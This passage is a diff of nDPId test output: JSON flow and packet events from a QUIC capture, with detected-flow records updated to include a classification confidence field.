-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421316093,"flow_last_seen":1621421316093,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621421316093,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1621421316389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621421316389,"pkt":"AAAAAAAAAAEAVM4PCABFAAViQWNAAH4RSIKokEAF8YqThcdtAbsFToluw\/8AAB0Id4dqLmNRgiwAAEU0su8kgEC6CAiECyO1DkLdw6Gs9g5xqr46q4bXQKhwHnhSO1cvEZxiK8zZ0UUvMHGZI9iz4bjhoHMMbIOMlQjzD7lXKLskiaS9BH5d+nSpKWAlTk\/VzCyrJIDUEaoJEECyuW3tKvwl9spRker8xQmMYntXENQ02IwoiaKvWtw+SOjVwVA8eWlOm9NAMebNzUMZPYZs73GU1OPqu9byjmqUVZ3gNjVQQ\/nOwz51imkNuYu+w7\/8LyJUGaPm5Fwuk3Bsj2YKxipADsvK8J6MTwckTe0mCX\/jSQ76gOCjnkz8hrVtk4EjqvRSRrrQmlglk\/VPrf\/qKvU58cAcB2xVriX4o5h7C5eOAMRU3+HqrLXNHljg7aEauwVEO8m3ekwDO3icqHHRs7WM+ylBxpldD58pCtxwZ0ij9QfdRWH5ZxqEDPqJoHBdj95wIyZ4ORnYdmNnyGHi8MllAUcQIs8tjWMWB3yoe5EdClD6nZBCG59SvjdsYcNJAVVbBE80ehJfa\/upspBC4CISksJmbwdDStCmaDAP9wtOaXIqg9O5ZkIDmdoOOPEfmjm9K4dOQ6LB36bvZXw3SHE4hzY8DBpxFYHrnweWWjg3jzTy7z1UBgCcL5L8M3V1G4k+M8cjEG+qLyzWt+I0t9W8p+QppsTxLemIrKhRlTLQxRaQrn45B1vfZAeZl22mIthc1844odpSJYhOqC6tqIizeYmhjyC8Xc50S3AW5Mvlz9zSASlezjlHYB6l0h4HiECb78KTFOP0RzpXeC761f6XbR3TSUj2Kd6CiigfBxHImCUWBJeYhQ63K13s3Mm3\/yXQW+jtNDe40QrWm9YjjkoIVMSIWB0+IuXcOTK5iuV5r2NouN\/mq7KvUEJUIOslfnalmFaf7ZfIdPjgyQVz9FrKHnQkvaAtpM4SfwUn5akQL58gGN5ju0ezdhVBAUVoBrH7IQl1dE5m2gKH\/nc0+RTVVCbReUNeb\/d89W9jKsi0qHAjg830USO454jnFfGNPY396nJq\/esXpli7iKbr\/IAN7feLYAiWUNShRLTeLj0DM+fUbWyB7fiC2WAV\/4DdYTKVEz03e+e0crF+jhU0\/1fTcsMLkra8V1CBeXadKcji8HnzmIEixBMdXwKZYUWkoYB+sbVXni\/V+D++lf65eXUFF31BC5lP3qxi9ycB00LRdjtUjOItXt+m1hKug2VkfXSqpqc3\/GtG5atDCNyPml8KVYSebQNsNdtmEfNkMvyIkKWIyHjBBCaaBUw85r3hizTmBO4zshJ54arJGmqYVjcViNP8016YDZ66VoiHKaJw\/kSImQpkWf0lmgqvatzHhJ\/LfjV6hqNjydlZCW3sLZFOzRqsHvU5fI\/FmsYH8YkApnb+m45Kx2rJzSfYc+L2hlvF4a7+7fNL+7iaVFfd\/CRuXc9u272HHy40jLVNdRPqq4VV3rne\/q0H\/V1m8ntT3AELDOezhMgwVdok3Al1xhogWoqppG21ACx3PuonkAEFwkyjAL9ONzWF8DLDGXAOEdTah38TMQ2tg2FGelPV6Zo48hsuS172HDmBfJNthoNpqM6oYASTG\/RxdJdiw6zTrPbRM1ewux4TQduH6K6D3mWsV29BQOTHS0XXpDSszpB0pT5xkizyunUsTMnSmkyD6zVNXzQ5EMXzILn\/+7F\/G\/+5jctdI6\/dPPPLJpa6WPKzVPzwwzbjqGjx703Yxr\/kJULthDE\/zZhbousd0J3udWSBLz+4ztsXYH8xhH3IUM9oirjdGfttWqzyUvhSRYzH"}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621421253470,"flow_last_seen":1621421253804,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621421253509,"flow_last_seen":1621421253809,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -38,40 +38,40 @@
 00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1621425498439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621425498439,"pkt":"AAAAAAAAAAEAYl3ZCABFAAVi7ahAAEAR4FYKdU5k++wSxqzcAbsFTidpxP8AAB0Id06oCGAS\/SQAAEU0ed34HhSjMqu3wM3rp8Z7ywfKnATeCO1KNQbG+Q1AYYt5I2GKbEI4LPmTF\/Dg8oRvZW7+Hps\/zeWj4mRYkEWQqTJ1jKptKM4UEpyPZZwThhNGXqmj6pg6xKApWE\/oyF9g97k8sBAbAFjDVYEhNEZijtx\/4YuODy3D9E7bPZxpgcPMwpkKYui5mIAEgbi8+Rn0i3hcxUwY7q57V8pjWYX7+ImwcGnArVGy1OpvIF+ketJD73EkvbYzvYqF\/dx7vL5C3WdaRiA9Mfj4FAMj0RdomtiauTwZ9tZGvrn5iZc92HxM4jvRW53IfC7AsWzDXs2r5WAp0EASs6EpiisrRUGhmoOMYgx78xwP+jWjx1XXxbRaJ2HQc1mG\/NdnL1nuvR8nTgTtoDWHE51rI8jwmgCKy\/MRsXgdRCTYt8oDCgeFipZsTgwY7S+w9r+p5dQqS7ggXdDcdXTMpzrMFGpZUtfmnyOuFY8EUJBOZtyPVfAgZ2J9lHR4O7H0HFN20uv52\/nqryE+o15lojuNbE7xE6hnJRxYacEhTZ+adxZvTe3ZbcZp+ArC5OwrDguig7jjNBMIHugEUzqkfH\/jaFQLD8JFWvrgHaj8qu5B5PjtqF5oB1qsGzCGjGh1UBZltV0pg4iY3Fee6NHV1exKrosArB\/8w\/C5lj6qgKibGsNPFBHUDqfs6Jz8s6FD8M0RwKxS0XYvh4HQDhIs8KDnCgCOc5ZqpGzAxWE2sFtQm1X9ZdTNBYdCxTR75QqGKVUyAwDY6MS5DrXKqWXB4m86kt3QfAFZUD0r04ROd5Iy0wrnwdGHMkbwXSsDDW5fdt4YYwn\/mhfO7TJ4ZKBrSJ5T+p8gpO0GzoZC+lIbATWgjqE\/P\/wDIp6NdKYeA+8geSI7YZP4nWfDgSoIHZphZHbocFnUUiNrBJ+JtQJCV1GcW2T5EMvwWWQ+zc5iC76n0qfV0F8WZ0UcVFvIhbjTEkm5tN09Sz35bubHZC7borBe9wGaBdUWuvbDKcYxKkDlCqHQh6sGHMEZvO8ITeoApd4s+sy32VthAMZfwzAkcp543Nd9arJlBQRns5ovQ74CEqV\/1SFXZ6AcxWiYbvYtKsu\/PXbKxEWRX\/bLqtCaRALrGa7LpwKvTT+nAPIfY1QuCMkJVs1njoj7EW\/n+6IFSplTtx1+YI+f46mZhIFNeEaX2QhADqN3oRrKwNDIyXpLg42uHmw6eyK87UJQsPtU8fbi0YLvgdhwLKYwc26rmYVcgZA2atbyib2Uj5alm78AkDkA5B6DNcz26jK7Xdi7HuV2TaALNudIatJBaYrNO2BlOvKywUaBJyggz39eP2g7XmeWd3aYE1aVTmJh\/X5Qlrz9C2EIg7WTIcETGQEy8F90A79pH7Soo5GcuPSyFrXtm5pfyZ8ekVtDas4uVjKMf\/55+t6uPRCl+GGDV091JgGbVqRR+qTbedv71GzRsoHrnHdTCw0\/6n5hRMqNjCHohMyyw+z8G1vmqSYMeQSMcWwzZON\/Jpnf2+CCqG3a7qlN1pPPkFyQhCllDNBRGdLWESKJhwxAioLHXjcdaXMywR8L7AS4Q2pkh1vrE4OB5IkU5Akg+78J9kzElSj\/7UWmlJ1BP49+zt9iG1OkS+1eOA9H1HXTQnB3rdU7jlLnCc+mS9YO5piXufWtmGBMHav\/cH2i1z7Nj\/YeOefBJDB6J9Vay5mTPGEHAWOZWU35b1ecCTk0q59LDDSBSuCpCzIgENLQ9BsmRpTJ1p\/5t5pYrOotQhCsIUt4ZYseRcaE"}
-00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00691{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1621425516873,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621425516873,"pkt":"AAAAAAAAAAEAaACzCABFAAVi\/6ZAAEARdvkKdU5kypibedfpAbsFTqmnyf8AAB0IsJwtqP2LOOwAAEU0PbMNV+Nmu5DIBUiD5lV4SUmkAFIOJpUhquUbkJoyjAxBM3gtgG81k6lhzA3GQE8tVB\/S296\/Vm2Zxaenrapxc2ryyJf3KX33MoNtBeSuxOyEjdN50pJD4IMrhuAo8nfxKG6fLj9F7lLvICTV\/vlkHUn8yq3RpGdoDFOYvOtuCt1zawf8weQRnfp4xT1kOhHEDxHVv3bNZbM5nRRJXxXGUaGOz22milo75Yy260QtHR4aoaeFIln1kEu0Lim1RK2gIG3MjkVIIfGYE828l6gKFLAUfvWyTEYYCubVd8+CKJEzaO\/afD6oH5Y+bKAztlPySihidV\/90CKHnjQSRTY+hapGYGfImwKn+7gwJ0y8ENI6zq2Ih7o8GVIuZBwsmgHPKVoI\/krv0+O9osznOQz68C3vRsk1lna2++Eh\/eGS6oVNvaQ9HWU8IOAO+hUpNSDAIpk8z853xu8BoWAYiv13BqICJAyIWzO+XisJ7ZDbQazmstS1X4Ro4beEy\/NpDmgrHs\/2pa7Zx6xAb0+3G7FsuNHBfazEIqD5ZaxPUSzBN2h9+9XzJ8MjsV2QQaUNPKl5I3TcN6uLucyXyzoKtyZvx5m9Myxjpit2V2hvKZoZMAufeIdZgn3bjdomXrscSN1kh89eZFiv+8sYO520yhiz9Evn\/LyuQ4s3jZpT\/D2t8PxQoF8xBbRM4zYc7mLtB7P7mWuCpbELISFHcTd1dWZWKO0foIWL29u+grT0xfq4G03G5Sdlh6g1Tl76tw8ffNRyJI3B1Zll6LpvOOT++553ZZZqQa3dmFoR3AuvZwf2iw+7omds46sgvQhiRN4h3ZF2B3hT0H553qSfJVf4VpupfglxjFiuInrFgySWKfAzXArMN+oCMOC4SKZEMeUovKPTvnb6vai123eTNft\/vwXrMQQqNDZKuK5WJP9n6bql9xt+K6gqLuWDibIsa7IxJZOdak6WDJKf6u4rc9CLeCfpZ+GDha\/Ykxp0z9I7MyUvNbVkIJM\/\/ALKQXgF9YFg335wWbGJ8oeev0cFKhtD7JCQbdZz00KdQoKXGN+waVJ8KTPJCUvnXb3d0W4Fg26R\/P47ckP8VwYPQ0fWuFNGOND8uFBwF\/d3ueP0Anz4sfSw9hA0aszUtBllmz+NjVBZMaAVseucfSE9+FWtSW\/KsQybDuj9Hdnq3g3OWz1pqPNSI+HFuqWF8kQGfGwENovGwhVwKpXQnz+0BZTlc82FjLmWo7drbFueC+RSI7H7oib+IE4+I2hWvpUn3YTZ1WyrdeA0MBi5AqQOhNsHHnx76MGBKrRzlZllpZzmHpoD\/tJSEv6IBAqZAZIHyZYvETkvTQebRoyNKdTyTMYAOlqQcbtY58suf6NwY93EpSSHoAyvs7u6S34KR7j2gnjKUKqgaZ32XDZAiXBl6uHxguSNnHz\/0gic4akOjaNW1y36lv+MwNLpamJSA75xsY0Ag\/ayv1tDPlRq0SFYoyH\/L4BlSlxyXIpBXn6HDmzCBeqGRk\/SbP7MBhn1lhwnTyawxEZ\/gU0YfWVdkDqqI72zLJMAeO\/wRg13JYd2UqEyV84a2Jfyk1r4cyt9C7F0rhWFGR205l4xStcaYSinxImLl2pCKe5S2JSrskLuMGU92EeDCBi302RtMnd+pZkhUc\/dfq97n6+ubGkMSI0oohIfiZeWDID8SxamWtQv5ESk0SKFBP\/pMhJHpgeg965DR9H2osi8d4eJR+qyOMZCz7jHyZcC9RS2+yrCjEv3U9YnBDp5bAPDFrSnEw7i"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00626{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02301{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1621431299729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431299729,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+ktAAH4RGLyokEAFcfqJ89CcAbsFTkRlzP8AAB0IlfQu+B7a8qcAAEU0VAXtGbQ9llSdlBvWDRqBCRlkCr+wLAODpb6IkSqrNtQT0Fq+mFTNNcZuGPLGmtMQiTgX5ahNfvwc2wVeVnwpjQXgMuY9BTiBvljI8vW2WO7xkdJk5ldSQUgRVPQ66OOPIEevYhWr2qgdtK3s4RlbCBiOUHL2oc6mNd7wOVC5XPDLU15Pb1X9rKGpYODdHEw2PCdUqXQXbRHNCTvR++4cDKRlcnhpPvs6EU838tX9PcKuOpDKMkxV6FLY+fNJwo9tnmW2kblEbFsqwJpz\/\/Enxa34NjqtoZhoRtapSyZCnEvopODqREJ\/CbRey4CQrv2fnFjjq7IR9A9vEDzcPpksson3AN1P3XrLmYYoaUkTGHOgCdje7SEGLDVSb4npjqySIO7wN8vp5rSPM5nARZ1XOT9wXoHff7cCe+dyL08HzUnnLJyBinNLpzvNbCMm0QKhi69Iq30GgBOKJqAZysRaQ5GV4Mf0wvX77rFCRRa9yldcwD6XOuyQdNUHPUQ0mVgJn1umvmeNPG6nKZjJq\/KGBx7ctS+gpvFQ1y0aJegnLzsDI2wvLLmhR9R3DiAgytDTiAvkU65nFAyo+x3w4ph5M+o6WWzbbtjsrAAu780wrME3zeXVEG9zm\/D3uptFTZsQMrWiuAaPVLf96rTs6qYSSYT7sYTWl\/jdhLBcFgFDy19mw2Lkw0oDKrrArHJ7yFnHUJtANtQ21TmcvxB\/WIjHCz8GMrDUZLO4OL+1Z7DeRFozavYMggt1qJ8U9KCvWBAR23kR921lFVt6a6RAQr\/I7jLU7sxhNgbORnVRfOZ1MAqQI8IIaWCq4xYmb6WmBUSzoH5\/13r8jfLuzIL6b1\/1xuyK1tWaBwjxQ8cdpzOSdWlwWGTU85r1MWsmvvgBLQno8RQ+AAeZUXr\/6vclKA8Bkt5OZC6F\/+bo8hifoSORQrzeJzJJiiI5FanBwgqgIUFyRIOqxcbjrI0ERcNvwqyjkLLqGLsY7p23bRBCZkGYLR28zH0LBHV0E4a0nhRGBk0f+KMOczC6ffG4xUK4QqemNWTyR\/91lj1denqDLOozFi3s9mCEzX4+yJyt3koNWJYF5um+Cu3rUa5kiznDT4nkKCPucW47nzSCmVao4V886qRx5Fx0iQIhZYySPa1r\/WDeHAaJOfFYJVkJKXBVWbzBAEax6q6reJe4QC08bU5\/zqLbaU3p3TETZVXEWcMzHKQD+xmaiYax8+gqDaZYIyifU0NKnlhkl+knTdJdHOJGncWgecX7cZ8apFuaDFx8UDXeMSrVUMSg8izndsoloQROpF\/aZqcH\/OCBifGVJlyfDkwFvsOr8tK54nIg\/1cnqgMA7cZTlQOsYpxuCu2jMiDpXOfrkKeU1g7FA9f\/QLEQ71aZKG1rpKfo9DX1OvCkAat37rPibslfUdCAi0gtEzi+ed4jZsjTTtLfHjE42gsT3p0neSGtZDGwREWKTcya3MwMkr8y\/d3DdqmakPpf5GYFqWV3fR7TgU6cIOopkRSOcFKjDEWelXif4mHkRTG6rwTb+56lZ51kKqq1jDvERvqFEW5JginMwKZ\/lD3mwE4WQG\/o+y40DQu\/5PR3r5bhM1VHKHeN3CJnGug5p\/ZJp53IP681sF51Qt5pS8LzCO+rVnGa1rCOauVjEFEOyPp7wndr4g313ytaLKjzfjG8HveWQnAWD3q5pxGlBUxjPmLLEeKM1hHQLZMxXASZ2IisfUFkbyzFIAfCK09zSR6oQTD3gwuOcTrdJpdr\/4oePdnzAHWZa\/8h"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00623{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1621431301735,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621431301735,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFJlAAH4RYWOokEAFgPgYAdC3AbsFTjagy\/8AAB0I1Sc982lv31UAAEU0GEDsnXM1346f3LKi+0ayIgknr4Rq\/qs0KnGSjmOfgKkNQLp8xEER9Qne8K9Dj4EYthFazH8nwogOlBFgQV5y3Fel1wV8LOfanwEdPEJ1ZJp+4xJmJEH3ze6GZ4lwHZsbcqCDQrzxSxyr8toIULGu2G\/50l56HzZwoikffxbY+R49tRZw4KX0e9zURynZK56t+njmlBuQWU+smCZVyJ9ypPFqKVXN7S\/8ucoFZ1YyJMN\/N8kqlm3ji7IGbOPNlw7irQvJ6BBxEwQlUJMHY0WKWUxD0Eb1MsXzLo9XO22gWFU3joZpaiSrB\/RDWZ1rp1Hfn0Ci0a8\/o47LT17Bf3EWgNA6oe86KkT1J6TFj5TGCEop\/KtIZTLdJ31PosLBOaXCkGm7G3FNW0bcjpPN+DwH3F\/o5LJ+Jg6E3+JR3af\/NqmM5lUPNhBagosvNZLci5aDdihLZLOTUxbxzA1HCgT\/ERn0TtIo+cvYtDBmA42xHr7Zw91voifBIp9+1r9Wgz2+fhJw6YMkrw\/R0ppcnpZJDX0HcDeOv1QITYaPEMCvPZWtVD56xX\/nIyNhER8spzpXJhfyZ7CLt2MQTJZYrSynYdh2Qhg0W\/Nnv+YnvHUimL5v9ucOAhisPrHZU6G8ccZVN9RPBkZp7we5VOgt\/sHvnaKFG385oGUa113YRpL+yC9+apyL7k0Lf9A9mH6jbSNwop0gbOz\/dSwao004T49FUKY+MYQSd1ZqRfOYZDWWvt4Z1